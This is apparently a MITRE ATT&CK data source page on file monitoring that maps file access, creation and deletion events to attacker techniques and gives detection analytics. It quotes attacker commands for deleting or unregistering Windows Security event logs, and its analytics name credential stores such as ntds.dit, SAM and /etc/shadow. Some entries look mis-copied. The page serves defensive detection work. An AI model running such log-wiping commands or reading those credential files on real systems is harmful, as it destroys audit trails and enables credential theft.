File

A computer resource object, managed by the I/O system, for storing data (such as images, text, videos, computer programs, or any wide variety of other media).[1]

ID: DS0022
Platforms: Linux, Network, Windows, macOS
Collection Layer: Host
Contributors: Center for Threat-Informed Defense (CTID)
Version: 1.0
Created: 20 October 2021
Last Modified: 07 December 2022

Data Components

File: File Access

Opening a file, which makes the file contents available to the requestor (ex: Windows EID 4663)

File: File Access

Opening a file, which makes the file contents available to the requestor (ex: Windows EID 4663)

Domain ID Name Detects
Enterprise T1087 Account Discovery

Monitor access to file resources that contain local accounts and groups information such as /etc/passwd, /Users directories, and the SAM database.

If access requires high privileges, look for non-admin objects (such as users or processes) attempting to access restricted file resources.

.001 Local Account

Monitor access to file resources that contain local accounts and groups information such as /etc/passwd, /Users directories, and the Windows SAM database.

If access requires high privileges, look for non-admin objects (such as users or processes) attempting to access restricted file resources.

Enterprise T1119 Automated Collection

Monitor for unexpected files (e.g., .pdf, .docx, .jpg, etc.) viewed for collecting internal data.

ICS T0802 Automated Collection

Monitor for unexpected files (e.g., .pdf, .docx, .jpg) viewed for collecting internal data.

Enterprise T1020 Automated Exfiltration

Monitor for abnormal access to files (i.e. .pdf, .docx, .jpg, etc.), especially sensitive documents, through the use of automated processing after being gathered during Collection.

Enterprise T1217 Browser Information Discovery

Monitor for unusual access to stored browser data, such as local files and databases (e.g., %APPDATA%/Google/Chrome).[2] Rather than viewing these events in isolation, this activity may highlight a chain of behavior that could lead to other activities, such as Collection and Exfiltration.

Enterprise T1555 Credentials from Password Stores

Monitor for files being accessed that may search for common password storage locations to obtain user credentials.

.001 Keychain

Monitor for Keychain files being accessed that may be related to malicious credential collection.

.003 Credentials from Web Browsers

Identify web browser files that contain credentials such as Google Chrome’s Login Data database file: AppData\Local\Google\Chrome\User Data\Default\Login Data. Monitor file read events of web browser files that contain credentials, especially when the reading process is unrelated to the subject web browser.

.004 Windows Credential Manager

Consider monitoring file reads to Vault locations, %Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\, for suspicious activity.[3]

.005 Password Managers

Monitor file reads that may acquire user credentials from third-party password managers.[4]

Enterprise T1005 Data from Local System

Monitor for unexpected/abnormal access to files that may be malicious collection of local data, such as user files (pdf, .docx, .jpg, etc.) or local databases.

ICS T0893 Data from Local System

Monitor for unexpected/abnormal access to files that may be malicious collection of local data, such as user files (e.g., .pdf, .docx, .jpg, .dwg ) or local databases.

Enterprise T1039 Data from Network Shared Drive

Monitor for unexpected files (i.e. .pdf, .docx, .jpg, etc.) interacting with network shares.

Enterprise T1025 Data from Removable Media

Monitor for unexpected/abnormal file accesses to removable media (optical disk drive, USB memory, etc.) connected to the compromised system.

Enterprise T1074 Data Staged

Monitor processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib.

.001 Local Data Staging

Monitor processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib.

.002 Remote Data Staging

Monitor processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib.

Enterprise T1114 Email Collection

Monitor for unusual processes access of local system email files for Exfiltration, unusual processes connecting to an email server within a network, or unusual access patterns or authentication attempts on a public-facing webmail server may all be indicators of malicious activity.

.001 Local Email Collection

Monitor for unusual processes accessing local email files that may target user email on local systems to collect sensitive information.

Enterprise T1048 Exfiltration Over Alternative Protocol

Monitor for suspicious files (i.e. .pdf, .docx, .jpg, etc.) viewed in isolation that may steal data by exfiltrating it over a different protocol than that of the existing command and control channel.

.001 Exfiltration Over Symmetric Encrypted Non-C2 Protocol

Monitor for files viewed in isolation that may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel.

.002 Exfiltration Over Asymmetric Encrypted Non-C2 Protocol

Monitor files viewed in isolation that may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel.

.003 Exfiltration Over Unencrypted Non-C2 Protocol

Monitor files viewed in isolation that may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel.

Enterprise T1041 Exfiltration Over C2 Channel

Monitor for suspicious files (i.e. .pdf, .docx, .jpg, etc.) viewed in isolation that may steal data by exfiltrating it over an existing command and control channel.

Enterprise T1011 Exfiltration Over Other Network Medium

Monitor for files being accessed that could be related to exfiltration, such as file reads by a process that also has an active network connection.

.001 Exfiltration Over Bluetooth

Monitor for files being accessed that could be related to exfiltration, such as file reads by a process that also has an active network connection. Also monitor for and investigate changes to host adapter settings, such as addition and/or replication of communication interfaces.

Enterprise T1052 Exfiltration Over Physical Medium

Monitor file access on removable media that may attempt to exfiltrate data via a physical medium, such as a removable drive.

.001 Exfiltration over USB

Monitor file access on removable media that may attempt to exfiltrate data over a USB connected physical device.

Enterprise T1567 Exfiltration Over Web Service

Monitor for files being accessed by an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel.

.001 Exfiltration to Code Repository

Monitor for files being accessed to exfiltrate data to a code repository rather than over their primary command and control channel.

.002 Exfiltration to Cloud Storage

Monitor for files being accessed to exfiltrate data to a cloud storage service rather than over their primary command and control channel.

.004 Exfiltration Over Webhook

Monitor for files being accessed to exfiltrate data to a webhook as a malicious command and control channel.

Enterprise T1187 Forced Authentication

Monitor for unexpected files used to gather credentials when the files are rendered

Enterprise T1654 Log Enumeration

Monitor for access to system and service log files, especially from unexpected and abnormal users.

Enterprise T1003 OS Credential Dumping

Monitor for hash dumpers opening the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM). Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised ( LinkById: T1078) in-use by adversaries may help as well.

.002 Security Account Manager

Monitor for hash dumpers opening the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM). Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised Valid Accounts in-use by adversaries may help as well.

.003 NTDS

Monitor for access or copy of the NTDS.dit.

Note: Events 4656 and 4663 (Microsoft Windows Security Auditing) provide context of processes and users requesting access or accessing file objects (ObjectType = File) such as C:\Windows\NTDS\ntds.dit. It is important to note that, in order to generate these events, a System Access Control List (SACL) must be defined for the ntds.dit file. Access rights that allow read operations on file objects and its attributes are %%4416 Read file data, %%4419 Read extended file attributes, %%4423 Read file attributes. If you search for just the name of the file and not the entire directory, you may get access events related to the ntds.dit file within a snapshot or volume shadow copy.

Events 4656 and 4663 (Microsoft Windows Security Auditing) provide context of processes and users creating or copying file objects (ObjectType = File) such as C:\Windows\NTDS\ntds.dit. It is important to note that, in order to generate these events, a System Access Control List (SACL) must be defined for the ntds.dit file. In order to filter file creation events, filter access rigths %%4417 Write data to the file and %%4424 Write file attributes.

Event 11 (Microsoft Windows Sysmon) provide context of processes and users creating or copying files. Unfortunately, this event provides context of the file being created or copied, but not the file being copied. A good starting point would be to look for new files created or copied with extension .dit.

Analytic 1

suspicious_file = filter file_access where ((event_id = "4656" OR event_id = "4663") AND (object_type = "File") AND(file_name = "ntds.dit") AND(access_list = "%%4416" OR access_list = "%%4419" OR access_list = "%%4416")

Analytic 2

suspicious_file = filter file_access where ((event_id = "4656" OR event_id = "4663") AND (object_type = "File") AND(file_name = "ntds.dit") AND(access_list = "%%4417" OR access_list = "%%4424")

Analytic 3

suspicious_file = filter file_access where ((event_id = "11") AND (file_name = "*.dit")

.007 Proc Filesystem

Monitor for unexpected access to passwords and hashes stored in memory, processes must open a maps file in the /proc filesystem for the process being analyzed. This file is stored under the path /proc/\/maps, where the \ directory is the unique pid of the program being interrogated for such authentication data. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs.

.008 /etc/passwd and /etc/shadow

Monitor for files being accessed that may attempt to dump the contents of /etc/passwd and /etc/shadow to enable offline password cracking. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes attempting to access /etc/passwd and /etc/shadow, alerting on the pid, process name, and arguments of such programs.

Enterprise T1018 Remote System Discovery

Monitor for files (such as /etc/hosts) being accessed that may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system.

For Windows, Event ID 4663 (An Attempt Was Made to Access An Object) can be used to alert on access attempts of local files that store host data, including C:\Windows\System32\Drivers\etc\hosts.

For Linux, auditing frameworks such as the audit daemon (auditd) can be used to alert on access attempts of local files that store host data, including /etc/hosts.

ICS T0846 Remote System Discovery

Monitor for files (such as /etc/hosts) being accessed that may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system.

ICS T0888 Remote System Information Discovery

Monitor for files (such as /etc/hosts) being accessed that may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system.

Enterprise T1091 Replication Through Removable Media

Monitor for unexpected files accessed on removable media.

ICS T0847 Replication Through Removable Media

Monitor for files accessed on removable media, particularly those with executable content.

Enterprise T1649 Steal or Forge Authentication Certificates

Monitor for attempts to access files that store information about certificates and their associated private keys. For example, personal certificates for users may be stored on disk in folders such as %APPDATA%\Microsoft\SystemCertificates\My\Certificates\.[5][6]

Enterprise T1558 Steal or Forge Kerberos Tickets

Monitor for unexpected processes interacting with lsass.exe.[7] Common credential dumpers such as Mimikatz access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored. Monitor for unusual processes accessing secrets.ldb and .secrets.mkey located in /var/lib/sss/secrets/.

Enterprise T1539 Steal Web Session Cookie

Monitor for an attempt by a user to gain access to a network or computing resource, often by providing credentials to cloud service management consoles. Some cloud providers, such as AWS, provide distinct log events for login attempts to the management console.

Enterprise T1033 System Owner/User Discovery

Monitor for hash dumpers opening the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM). Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised Valid Accounts in-use by adversaries may help as well.

Enterprise T1552 Unsecured Credentials

Monitor for suspicious file access activity, specifically indications that a process is reading multiple files in a short amount of time and/or using command-line arguments indicative of searching for credential material (ex: regex patterns). These may be indicators of automated/scripted credential access behavior. Monitoring when the user's .bash_history is read can help alert to suspicious activity. While users do typically rely on their history of commands, they often access this history through other utilities like "history" instead of commands like cat ~/.bash_history.

.001 Credentials In Files

Monitor for files being accessed that may search local file systems and remote file shares for files containing insecurely stored credentials. While detecting adversaries accessing these files may be difficult without knowing they exist in the first place, it may be possible to detect adversary use of credentials they have obtained.

.003 Bash History

Monitoring when the user's .bash_history is read can help alert to suspicious activity.

.004 Private Keys

Monitor access to files and directories related to cryptographic keys and certificates as a means for potentially detecting access patterns that may indicate collection and exfiltration activity.

.006 Group Policy Preferences

Monitor for attempts to access SYSVOL that involve searching for XML files.

ICS T0863 User Execution

Anti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning PowerShell).

File: File Creation

Initial construction of a new file (ex: Sysmon EID 11)

File: File Creation

Initial construction of a new file (ex: Sysmon EID 11)

Domain ID Name Detects
Enterprise T1560 Archive Collected Data

Monitor newly constructed files being written with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.

.001 Archive via Utility

Monitor newly constructed files being written with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.

.002 Archive via Library

Monitor newly constructed files being written with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.

.003 Archive via Custom Method

Monitor newly constructed files being written with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.

Enterprise T1547 Boot or Logon Autostart Execution

Monitor for newly constructed files that may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems.

.006 Kernel Modules and Extensions

Monitor for newly constructed files that may modify the kernel to automatically execute programs on system boot.

.008 LSASS Driver

Monitor newly constructed files that may modify or add LSASS drivers to obtain persistence on compromised systems.

.009 Shortcut Modification

Monitor for LNK files created with a Zone Identifier value greater than 1, which may indicate that the LNK file originated from outside of the network.[8] Analysis should attempt to relate shortcut creation events to other potentially suspicious events based on known adversary behavior such as process launches of unknown executables that make network connections.

.010 Port Monitors

Monitor newly constructed files that may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.

.012 Print Processors

Monitor for newly constructed files that may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation.

.013 XDG Autostart Entries

Malicious XDG autostart entries may be detected by auditing file creation events within the /etc/xdg/autostart and ~/.config/autostart directories. Depending on individual configurations, defenders may need to query the environment variables $XDG_CONFIG_HOME or $XDG_CONFIG_DIRS to determine the paths of Autostart entries. Autostart entry files not associated with legitimate packages may be considered suspicious. Suspicious entries can also be identified by comparing entries to a trusted system baseline.

.015 Login Items

All login items created via shared file lists are viewable by using the System Preferences GUI or in the ~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm file.[9][10][11][12] These locations should be monitored and audited.

Enterprise T1037 Boot or Logon Initialization Scripts

Monitor for newly constructed files that may use scripts automatically executed at boot or logon initialization to establish persistence.

.002 Login Hook

Monitor for the creation of and/or changes to login hook files (/Library/Preferences/com.apple.loginwindow.plist), especially by unusual accounts outside of normal administration duties.

.003 Network Logon Script

Monitor for newly constructed files by unusual accounts outside of normal administration duties

.004 RC Scripts

Monitor for newly constructed /etc/rc.local file

.005 Startup Items

Monitor for newly constructed files by unusual accounts outside of normal administration duties

Enterprise T1176 Browser Extensions

Monitor for newly constructed files and/or all installed extensions maintain a plist file in the /Library/Managed Preferences/username/ directory. Ensure all listed files are in alignment with approved extensions

Enterprise T1554 Compromise Client Software Binary

Monitor for newly constructed files that may modify client software binaries to establish persistent access to systems.

Enterprise T1659 Content Injection

Monitor for unexpected and abnormal file creations that may indicate malicious content injected through online network communications.

Enterprise T1543 Create or Modify System Process

Monitor for newly constructed files that may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence.

.001 Launch Agent

Monitor for newly constructed files that may create or modify launch agents to repeatedly execute malicious payloads as part of persistence.

.002 Systemd Service

Systemd service unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and /home//.config/systemd/user/ directories, as well as associated symbolic links

.004 Launch Daemon

Monitor for new files added to the /Library/LaunchDaemons/ folder. The System LaunchDaemons are protected by SIP.

Enterprise T1486 Data Encrypted for Impact

Monitor for newly constructed files in user directories.

Enterprise T1565 Data Manipulation

Monitor for newly constructed files in order to manipulate external outcomes or hide activity

.001 Stored Data Manipulation

Monitor for newly constructed files in order to manipulate external outcomes or hide activity

.003 Runtime Data Manipulation

Monitor for newly constructed files in order to manipulate external outcomes or hide activity

Enterprise T1074 Data Staged

Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.

.001 Local Data Staging

Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.

.002 Remote Data Staging

Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.

Enterprise T1491 Defacement

Monitor for newly constructed visual content for internal or external enterprise networks.

.001 Internal Defacement

Monitor for newly constructed files that may deface systems internal to an organization in an attempt to intimidate or mislead users.

.002 External Defacement

Monitor for newly constructed files that may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users.

Enterprise T1006 Direct Volume Access

Monitor for the creation of volume shadow copy and backup files, especially unexpected and irregular activity (relative to time, user, etc.).

Enterprise T1189 Drive-by Compromise

Monitor for newly constructed files written to disk to gain access to a system through a user visiting a website over the normal course of browsing.

ICS T0817 Drive-by Compromise

Monitor for newly constructed files written to disk through a user visiting a website over the normal course of browsing.

Enterprise T1546 Event Triggered Execution

Monitor newly constructed files that may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events.

.002 Screensaver

Monitor newly constructed files that may establish persistence by executing malicious content triggered by user inactivity.

Analytic 1 - Created on disk that are being used as Screensaver files

screensaver_key_modification = filter ProcessGuid, ProcessFilePath, UserName, RegistryKeyPath, RegistryKeyValueData where event_id == "13" AND RegistryKeyPath LIKE '%Software\Policies\Microsoft\Windows\Control Panel\Desktop\SCRNSAVE.EXE%'

new_files = filter ProcessFilePath, UserName, FileName where event_id == "11"

suspicious_files = filter k.ProcessGuid, k.ProcessFilePath, k.UserName, k.RegistryKeypath, k.RegistryKeyValueData FROM screensaver_key_modification kINNER JOIN new_files fON k.RegistryKeyValueData = f.FileName

.004 Unix Shell Configuration Modification

Monitor for newly constructed files that may establish persistence through executing malicious commands triggered by a user’s shell. For most Linux and macOS systems, a list of file paths for valid shell options available on a system are located in the /etc/shells file.

.005 Trap

Monitor for newly constructed files that may establish persistence by executing malicious content triggered by an interrupt signal.

.008 Accessibility Features

Monitor newly constructed files that may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features.

.013 PowerShell Profile

Locations where profile.ps1 can be stored should be monitored for new profiles. [13] Example profile locations include:* $PsHome\Profile.ps1* $PsHome\Microsoft.{HostProgram}_profile.ps1* $Home\My Documents\PowerShell\Profile.ps1* $Home\My Documents\PowerShell\Microsoft.{HostProgram}_profile.ps1

.014 Emond

Monitor emond rules creation by checking for files created in /etc/emond.d/rules/ and /private/var/db/emondClients.

.016 Installer Packages

Monitor creation of files associated with installer packages that may be abused for malicious execution.

Enterprise T1187 Forced Authentication

Monitor for newly constructed .LNK, .SCF, or any other files on systems and within virtual environments that contain resources that point to external network resources

Enterprise T1564 Hide Artifacts

Monitor for newly constructed files that may attempt to hide artifacts associated with their behaviors to evade detection.

.001 Hidden Files and Directories

Monitor the file system and shell commands for files being created with a leading "."

.006 Run Virtual Instance

Monitor for newly constructed files associated with running a virtual instance, such as binary files associated with common virtualization technologies (ex: VirtualBox, VMware, QEMU, Hyper-V).

.009 Resource Forking

Monitor for newly constructed files that may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications.

Enterprise T1574 Hijack Execution Flow

Monitor for newly constructed files that may execute their own malicious payloads by hijacking the way operating systems run programs.

.001 DLL Search Order Hijacking

Monitor newly constructed .manifest and .local redirection files that do not correlate with software updates.

.002 DLL Side-Loading

Monitor for newly constructed files in common folders on the computer system.

.004 Dylib Hijacking

Monitor for newly constructed dylibs

.005 Executable Installer File Permissions Weakness

Monitor for newly constructed files to match an existing service executable, it could be detected and correlated with other suspicious behavior.

.006 Dynamic Linker Hijacking

Monitor for newly constructed files that are added to absolute paths of shared libraries such as LD_PRELOAD on Linux and DYLD_INSERT_LIBRARIES on macOS.

.007 Path Interception by PATH Environment Variable

Monitor for newly constructed files for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Also, monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.

.008 Path Interception by Search Order Hijacking

Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Also, monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.

.009 Path Interception by Unquoted Path

Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Also, monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.

.010 Services File Permissions Weakness

Monitor for creation of binaries and service executables that do not occur during a regular software update or an update scheduled by the organization. This behavior also considers files that are overwritten.

Enterprise T1105 Ingress Tool Transfer

Monitor for file creation and files transferred into the network

Enterprise T1570 Lateral Tool Transfer

Monitor newly constructed files to/from a lateral tool transfer

ICS T0867 Lateral Tool Transfer

Monitor for file creation in conjunction with other techniques (e.g., file transfers using Remote Services).

Enterprise T1036 .007 Masquerading: Double File Extension

Monitor for files written to disk that contain two file extensions, particularly when the second is an executable.

Enterprise T1556 Modify Authentication Process

Monitor for suspicious additions to the /Library/Security/SecurityAgentPlugins directory.[14]

Monitor for newly created files that may be used to register malicious network provider dynamic link libraries (DLLs).

.002 Password Filter DLL

Monitor for newly constructed files that may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated.

.008 Network Provider DLL

Monitor for newly created files that may be used to register malicious network provider dynamic link libraries (DLLs).

Enterprise T1027 Obfuscated Files or Information

Detection of file obfuscation is difficult unless artifacts are left behind by the obfuscation process that are uniquely detectable with a signature. If detection of the obfuscation itself is not possible, it may be possible to detect the malicious activity that caused the obfuscated file (for example, the method that was used to write, read, or modify the file on the file system).

.004 Compile After Delivery

Monitor for newly constructed files for payloads

.006 HTML Smuggling

Monitor for newly constructed files via JavaScript, developing rules for the different variants, with a combination of different encoding and/or encryption schemes, may be very challenging. Consider monitoring files downloaded from the Internet, possibly by HTML Smuggling, for suspicious activities. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities.

.009 Embedded Payloads

Monitor for newly constructed files containing large amounts of data. Abnormal file sizes may be an indicator of embedded content.

.012 LNK Icon Smuggling

Monitor for downloaded malicious files, though developing rules for the different variants, with a combination of different encoding and/or encryption schemes, may be very challenging. Consider monitoring files downloaded from the Internet, possibly by LNK Icon Smuggling, for suspicious activities. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities.

Enterprise T1137 Office Application Startup

Monitor for newly constructed files that may leverage Microsoft Office-based applications for persistence between startups.

.001 Office Template Macros

Monitor for newly constructed files that may abuse Microsoft Office templates to obtain persistence on a compromised system.

.002 Office Test

Monitor for newly constructed files that may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system.

.006 Add-ins

Monitor for newly constructed files that may abuse Microsoft Office add-ins to obtain persistence on a compromised system.

Enterprise T1003 .002 OS Credential Dumping: Security Account Manager

Monitor newly constructed files being written with default names that have extracted credentials from the Security Account Manager.

Enterprise T1566 Phishing

Monitor for newly constructed files from a phishing messages to gain access to victim systems.

.001 Spearphishing Attachment

Monitor for newly constructed files from a spearphishing emails with a malicious attachment in an attempt to gain access to victim systems.

Enterprise T1091 Replication Through Removable Media

Monitor for newly constructed files on removable media

ICS T0847 Replication Through Removable Media

Monitor for newly constructed files copied to or from removable media.

Enterprise T1496 Resource Hijacking

Monitor for common cryptomining or proxyware files on local systems that may indicate compromise and resource usage.

Enterprise T1053 Scheduled Task/Job

Monitor newly constructed files that may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code.

.005 Scheduled Task

Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc. In order to gain persistence, privilege escalation, or remote execution, an adversary may use the Windows Task Scheduler to schedule a command to be run at a specified time, date, and even host. Task Scheduler stores tasks as files in two locations - C:\Windows\Tasks (legacy) or C:\Windows\System32\Tasks. Accordingly, this analytic looks for the creation of task files in these two locations.

Analytic 1 - Scheduled Task - File Creation

task_files = filter files where ( (file_path = "C:\Windows\System32\Tasks*" or file_path = "C:\Windows\Tasks*") and image_path != "C:\WINDOWS\system32\svchost.exe")

.007 Container Orchestration Job

Monitor for newly constructed files by using the logging agents on Kubernetes nodes and retrieve logs from sidecar proxies for application and resource pods to monitor malicious container orchestration job deployments.

Enterprise T1505 Server Software Component

Consider monitoring file locations associated with the installation of new application software components such as paths from which applications typically load such extensible components.

.002 Transport Agent

Consider monitoring file locations associated with the installation of new application software components such as paths from which applications typically load such extensible components.

.003 Web Shell

File monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script.[15]

.004 IIS Components

Monitor for creation of files (especially DLLs on webservers) that could be abused as malicious ISAPI extensions/filters or IIS modules.

ICS T0865 Spearphishing Attachment

Monitor for newly constructed files from a spearphishing emails with a malicious attachment in an attempt to gain access to victim systems.

Enterprise T1553 .005 Subvert Trust Controls: Mark-of-the-Web Bypass

Monitor compressed/archive and image files downloaded from the Internet as the contents may not be tagged with the MOTW. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities.

Enterprise T1218 System Binary Proxy Execution

Monitor for file activity (creations, downloads, modifications, etc.), especially for file types that are not typical within an environment and may be indicative of adversary activity.

.001 Compiled HTML File

Monitor presence and use of CHM files, especially if they are not typically used within an environment.

.002 Control Panel

Monitor for newly constructed files that may forge web cookies that can be used to gain access to web applications or Internet services.

.005 Mshta

Monitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious

.014 MMC

Monitor for creation and use of .msc files. MMC may legitimately be used to call Microsoft-created .msc files, such as services.msc or eventvwr.msc. Invoking non-Microsoft .msc files may be an indicator of malicious activity.

Enterprise T1080 Taint Shared Content

Monitor for newly constructed files from files that write or overwrite many files to a network shared directory may be suspicious.

Enterprise T1204 User Execution

Anti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).

.001 Malicious Link

malicious documents and files that are downloaded from a link and executed on the user's computer

.002 Malicious File

Monitor for newly constructed files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).

While batch files are not inherently malicious, it is uncommon to see them created after OS installation, especially in the Windows directory. This analytic looks for the suspicious activity of a batch file being created within the C:\Windows\System32 directory tree. There will be only occasional false positives due to administrator actions.

For Windows, Sysmon Event ID 11 (File create) can be used to track file creation events. This event also provides the Process ID of the process that created the file, which can be correlated with process creation events (e.g., Sysmon Event ID 1) to determine if the file was downloaded from an external network.

For MacOS, utilities that work in concert with Apple’s Endpoint Security Framework such as File Monitor can be used to track file creation events.

Analytic 1 : Batch File Write to System32

batch_files = filter files where ( extension =".bat" AND file_path = "C:\Windows\system32*" )

File: File Deletion

Removal of a file (ex: Sysmon EID 23, macOS ESF EID ES_EVENT_TYPE_AUTH_UNLINK, or Linux commands auditd unlink, rename, rmdir, unlinked, or renameat rules)

File: File Deletion

Removal of a file (ex: Sysmon EID 23, macOS ESF EID ES_EVENT_TYPE_AUTH_UNLINK, or Linux commands auditd unlink, rename, rmdir, unlinked, or renameat rules)

Domain ID Name Detects
Enterprise T1554 Compromise Client Software Binary

Monitor for unexpected deletion of client software binaries to establish persistent access to systems.

Enterprise T1485 Data Destruction

Monitor for unexpected deletion to a file (ex: Sysmon EID 23)

ICS T0809 Data Destruction

Monitor for unexpected deletion of files.

Enterprise T1565 Data Manipulation

Monitor for unexpected deletion of a file in order to manipulate external outcomes or hide activity

.001 Stored Data Manipulation

Monitor for unexpected deletion of a file in order to manipulate external outcomes or hide activity

.003 Runtime Data Manipulation

Monitor for unexpected deletion of a file in order to manipulate external outcomes or hide activity

Enterprise T1562 Impair Defenses

Monitor for missing log files hosts and services with known active periods.

.012 Disable or Modify Linux Audit System

Monitor for missing log files from machines with known active periods.

Enterprise T1070 Indicator Removal

Monitor for a file that may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.

.001 Clear Windows Event Logs

Monitor for unexpected deletion of Windows event logs (via native binaries) and may also generate an alterable event (Event ID 1102: "The audit log was cleared"). When an eventlog is cleared, a new event is created that alerts that the eventlog was cleared. For Security logs, its event code 1100 and 1102. For System logs, it is event code 104.

It is unlikely that event log data would be cleared during normal operations, and it is likely that malicious attackers may try to cover their tracks by clearing an event log. When an event log gets cleared, it is suspicious.

  1. This is often done using wevtutil, a legitimate tool provided by Microsoft. This action interferes with event collection and notification, and may lead to a security event going undetected, thereby potentially leading to further compromise of the network.

  2. Alerting when a Clear Event Log is generated could point to this intruder technique. Centrally collecting events has the added benefit of making it much harder for attackers to cover their tracks. Event Forwarding permits sources to forward multiple copies of a collected event to multiple collectors, thus enabling redundant event collection. Using a redundant event collection model can minimize the single point of failure risk.

  3. Attackers may set the option of the sources of events with Limit-EventLog -LogName Security -OverflowAction DoNotOverwrite to not delete old Evenlog when the .evtx is full. By default the Security Log size is configured with the minimum value of 20 480KB (~23 000 EventLog). So if this option is enabled, all the new EventLogs will be automatically deleted. We can detect this behavior with the Security EventLog 1104.

  4. Attackers may delete .evtx with del C:\Windows\System32\winevt\logs\Security.evtx or Remove-Item C:\Windows\System32\winevt\logs\Security.evtx after having disabled and stopped the Eventlog service. As the EventLog service is disabled and stopped, the .evtx files are no longer used by this service and can be deleted. The new EventLog will be Unavailable until the configuration is reset.

  5. Attackers may use the powershell command Remove-EventLog -LogName Security to unregister source of events that are part of Windows (Application, Security…). This command deletes the security EventLog (which also generates EventId 1102) but the new Eventlogs are still recorded until the system is rebooted . After the System is rebooted, the Security log is unregistered and doesn’t log any new Eventlog. However logs generated between the command and the reboot are still available in the .evtx file.

Analytic 1 - User Activity from Clearing Event Logs

